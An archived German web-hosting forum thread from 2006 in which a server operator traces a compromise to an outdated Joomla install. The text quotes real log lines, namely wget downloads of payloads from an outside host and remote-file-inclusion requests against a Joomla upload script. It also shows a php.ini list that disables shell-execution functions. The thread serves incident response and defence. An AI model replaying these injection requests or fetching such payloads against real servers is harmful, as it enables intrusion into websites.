Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

DOS Attacke und aus war der Apache!

Hier können Sie Ihre Fragen zum Thema Suchmaschinenoptimierung (SEO) / Positionierung stellen
purzelonline
PostRank 5
PostRank 5
Beiträge: 261
Registriert: 23.02.2006, 23:00
Wohnort: Emmerich

Beitrag von purzelonline » 05.10.2006, 12:53

Hallo liebe Gemeinde,

wir hatten letzte Nacht eine üble Attacke auf unseren Rootserver.
Wie das nachfolgende Script sich installieren konnte, wissen wir derzeit noch nicht, es läßt auf jeden Fall den Speicher überlaufen und sorgt innerhalb von Minuten für 20GB Traffic. Ein Neustart des Apache mit "rcapache2 restart" bringt einen Error, nur "reboot" geht und das jetzt alle 60Minuten, denn dann geht der Apache in den Schlafmodus.

Hier ein Auszug aus der Error Apache:

--14:57:15-- https://saids.com/botek.txt
=> `botek.txt'
Resolving saids.com... done.
Connecting to saids.com[66.36.242.36]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,994 [text/plain]

0K .......... ...... 100% 1464.83 KB/s

14:57:15 (1464.83 KB/s) - `botek.txt' saved [16994/16994]

[client 210.193.55.2]
rm: cannot remove `botek.txt.*': No such file or directory
--14:57:21-- https://saids.com/a
=> `a'
Resolving saids.com... done.
Connecting to saids.com[66.36.242.36]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30,258 [text/plain]

0K .......... .......... ......... 100% 1487.94 KB/s

14:57:22 (1487.94 KB/s) - `a' saved [30258/30258]

Bitte dringend Hilfe, wir wir diesen Prozess stoppen bzw. auch erstmal finden?!

Bitte keine unkonstruktiven Kommentare wie: schafft Euch einen Administrator an oder holt Euch Webpakete bei 1und1!
Wir arbeiten seit 3 Jahren mit Rootservern und hatten bis heute keine Probleme und diesen Fall lernt man auch nicht mit Linuxstudium und diversen Handbüchern...

Vielen Dank

Anzeige von ABAKUS

von Anzeige von ABAKUS »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002
  • persönliche Betreuung
  • individuelle Beratung
  • kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.


reteep
PostRank 4
PostRank 4
Beiträge: 171
Registriert: 20.08.2006, 12:31
Wohnort: Aschaffenburg

Beitrag von reteep » 05.10.2006, 13:13

Ists denn immer die gleiche IP? Dann einfach die IP blocken.
In solchen Fällen kannst du dich in der Regel immer an den Support wenden, hatte ich auch schonmal und hab innerhalb 30 Minuten Hilfe bekommen.

Fox Mulder
PostRank 8
PostRank 8
Beiträge: 804
Registriert: 16.11.2004, 09:06

Beitrag von Fox Mulder » 05.10.2006, 13:20

Vielleicht hilft Dir das irgendwie weiter:
https://directadmin.com/forum/showthrea ... adid=14098

Kristian
PostRank 9
PostRank 9
Beiträge: 1484
Registriert: 20.07.2005, 16:30

Beitrag von Kristian » 05.10.2006, 13:21

Hallo

Die eigentliche Sicherheitslücke wirst du wohl in irgendeinem PHP-Modul / Script / Mod finden.
Gelesen?
https://forum.joomla.org/index.php?topic=89758.0;wap2

Ein

Code: Alles auswählen

disable_functions = exec,passthru,system,popen,proc_open,shell_exec,escapeshellcmd,escapeshellarg 
in der php.ini könnte als Lösung helfen, bis du die Lücke gefunden hast.

Gruss Kristian
Seo-Check Biete Links zu Schmuck und Hochzeit sowie Artikelplätze für Firmen allgemein.

Fox Mulder
PostRank 8
PostRank 8
Beiträge: 804
Registriert: 16.11.2004, 09:06

Beitrag von Fox Mulder » 05.10.2006, 13:32

Lies Dir hier mal die Postings von "either" durch:
https://www.directadmin.com/forum/showt ... adid=13646

purzelonline
PostRank 5
PostRank 5
Beiträge: 261
Registriert: 23.02.2006, 23:00
Wohnort: Emmerich

Beitrag von purzelonline » 05.10.2006, 15:07

Herzlichen Dank für die zahlreichen Tipps, wir konnten die php.ini erstmal ändern, allerdings läuft dieses Script immernoch.

Kann ich als ROOT bzw. Admin den Rootserver nach diesem Eintrag durchsuchen, also die Webpakete meiner Kunden, ohne mir jede Datei aus datenschutzgründen anschauen zu müssen?

Ich vermute eventuell ein Script eines Kunden, welches diese botek.txt
extern holt? Oder ist das ein falscher Ansatz?

Vielleicht kennt jemand einen Linuxprofi, der sich dieser Sache annehmen könnte, eine längere, vertrauensvolle Zusammenarbeit wäre nett.

Tiggr
PostRank 2
PostRank 2
Beiträge: 37
Registriert: 01.07.2006, 09:56

Beitrag von Tiggr » 05.10.2006, 17:00

Wenn es noch geht, das Modul mod_security für den Apachen installieren und das Regelset von gotroot.com. Dannach dürfte NICHTS mehr unbemerkt bleiben, kann aber auch dazu führen, dass zuviel geblockt wird.

Dann einfach in den Log-Modus wechseln und das treiben beobachten!

Kristian
PostRank 9
PostRank 9
Beiträge: 1484
Registriert: 20.07.2005, 16:30

Beitrag von Kristian » 05.10.2006, 17:15

Hallo

Kannst du nicht einfach die LogFiles nach "=http%3A%2F%2Fwww.domain.tld%2Fpath%2Fbotek.txt" durchsuchen?
So solltest du doch das Script / Modul finden, welches diese Datei lädt.

Gruss Kristian
Seo-Check Biete Links zu Schmuck und Hochzeit sowie Artikelplätze für Firmen allgemein.

Racker
PostRank 5
PostRank 5
Beiträge: 267
Registriert: 07.09.2004, 07:33

Beitrag von Racker » 05.10.2006, 18:12

Hatte das Problem auch. Da wurde in /var/tmp/ ein Bouncer installiert. Über diesen Bouncer wird dann versucht per script zuzugreifen und eine Verbindung zu Mirc herzustellen. Bei mir wars Psy-BNC. Reingekommen sie die Jungs über Mambo Galleryscript (schäm).
Habe dann mod_security installiert und die Rootkits Rules eingebunden.
Seit dem ist Ruhe. Versuchen zwar immer noch einige bekommen dann aber einen 403 Fehler.
Die Rules kann man für seine Verhältnisse anpassen.(böse Bots aussperren, zugriffe über Proxys, Emailspam unterbinden usw.)
Aber wie Tiggr schon sagte muss man ein bisschen aufpassen und die Logs beobachten ,damit man nicht einige Sachen ausperrt.
z.B wurde bei mir Google ausgesperrt weil nach "Ten Years After" gesucht wurde und After zu den gesperrten Worten gehörte :)

Racker

Kristian
PostRank 9
PostRank 9
Beiträge: 1484
Registriert: 20.07.2005, 16:30

Beitrag von Kristian » 05.10.2006, 18:55

Hallo

Ich lach mich weg...
Gerade rein zufällig realtime im Logfile:

Code: Alles auswählen

66.79.163.170 - - [05/Oct/2006:19:45:11 +0200] "GET /deutschland/1/components/com_simpleboard/image_upload.php?sbp=http://saids.com/c.txt? HTTP/1.1" 301 394 "-" "libwww-perl/5.805"
Kristian
Seo-Check Biete Links zu Schmuck und Hochzeit sowie Artikelplätze für Firmen allgemein.

Kristian
PostRank 9
PostRank 9
Beiträge: 1484
Registriert: 20.07.2005, 16:30

Beitrag von Kristian » 05.10.2006, 19:06

Ähhhemmm....

Code: Alles auswählen

203.127.111.114 - - [05/Oct/2006:19:58:38 +0200] "GET /deutschland/1/components/com_simpleboard/image_upload.php?sbp=http://68.88.63.97/c.txt? HTTP/1.1" 301 396 "-" "libwww-perl/5.79"
Das wird ja noch ne lustige Woche...
Seo-Check Biete Links zu Schmuck und Hochzeit sowie Artikelplätze für Firmen allgemein.

purzelonline
PostRank 5
PostRank 5
Beiträge: 261
Registriert: 23.02.2006, 23:00
Wohnort: Emmerich

Beitrag von purzelonline » 05.10.2006, 20:12

Wir haben den Übeltäter erstmal dingfest gemacht!!!! :-)

Es ist tatsächlich eine Joomla Installation Version 1.04, wir hatten dem
Kunden den SafeMode off gesetzt mit dem httpd Spezial Befehl:
php_admin_flag safe_mode off

Das war die Einladung für das schei** Script.

Für alle, die es auch trifft oder noch treffen sollte:
Auf einem Rootserver befindet sich im /tmp Ordner eine Datei mit dem Namen .sessx, die dort nichts zu suchen hat! Dort läuft das Script und stellt alle 2 Minuten eine Verbindung zum MIRC her.

Das Gute ist, es scheint nur Joomla Versionen zu betreffen, bei anderen Versuchen mit SafeMode Off konnten wir das Script nicht mehr finden.

Tiggr
PostRank 2
PostRank 2
Beiträge: 37
Registriert: 01.07.2006, 09:56

Beitrag von Tiggr » 06.10.2006, 11:07

Trotzdem solltet Ihr den Server komplett checken bzw. neu aufsetzen... Nicht das sich noch irgendwo etwas festgesetzt hat!

SloMo
PostRank 10
PostRank 10
Beiträge: 4880
Registriert: 04.01.2005, 18:26

Beitrag von SloMo » 06.10.2006, 12:03

> bei anderen Versuchen mit SafeMode Off konnten wir das Script nicht mehr finden.

Einmal unsicher, immer unsicher. Da hat Tiggr ganz Recht. Stichwort Rootkits.

purzelonline
PostRank 5
PostRank 5
Beiträge: 261
Registriert: 23.02.2006, 23:00
Wohnort: Emmerich

Beitrag von purzelonline » 06.10.2006, 14:42

Danke für die Antwort, ihr habt ja Recht mit dem Neuaufsetzen des Servers.
Problem sind die 90 Kunden, die wir je Server aufsetzen und da es keine weitere Unterstützung für Confixx gibt, werden wir auf Linux und Plesk umswitchen und jeden Kunden einzeln übertragen.

Das wird eine Süffizusarbeit, die sicher Wochen dauert wird.

Vielleicht kennt jemand ein Script oder Tool, um Confixx zu Plesk zu übertragen?

Purzel

Antworten
  • Vergleichbare Themen
    Antworten
    Zugriffe
    Letzter Beitrag